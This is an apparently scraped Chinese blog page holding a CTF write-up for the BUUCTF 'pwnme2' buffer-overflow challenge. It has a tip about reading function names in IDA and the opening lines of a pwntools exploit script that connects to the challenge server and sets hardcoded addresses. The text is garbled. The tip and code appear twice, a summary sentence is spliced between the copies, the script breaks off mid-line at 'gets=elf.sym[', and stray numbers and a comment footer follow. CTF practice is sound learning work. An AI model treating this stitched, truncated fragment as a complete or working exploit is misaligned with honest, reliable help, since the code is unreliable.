这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。
from pwn import *
p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')
exec_string=0x080485cb
string=0x0804a060
gets=elf.sym[
本文介绍了一篇关于使用IDA分析函数名获取提示,并通过构造payload利用缓冲区溢出漏洞执行特定指令获取shell的过程。文章中提到了payload制作的细节,特别是注意sendline函数的使用方式,避免了程序错误。
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。
from pwn import *
p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')
exec_string=0x080485cb
string=0x0804a060
gets=elf.sym[
364
810
2290

被折叠的 条评论
为什么被折叠?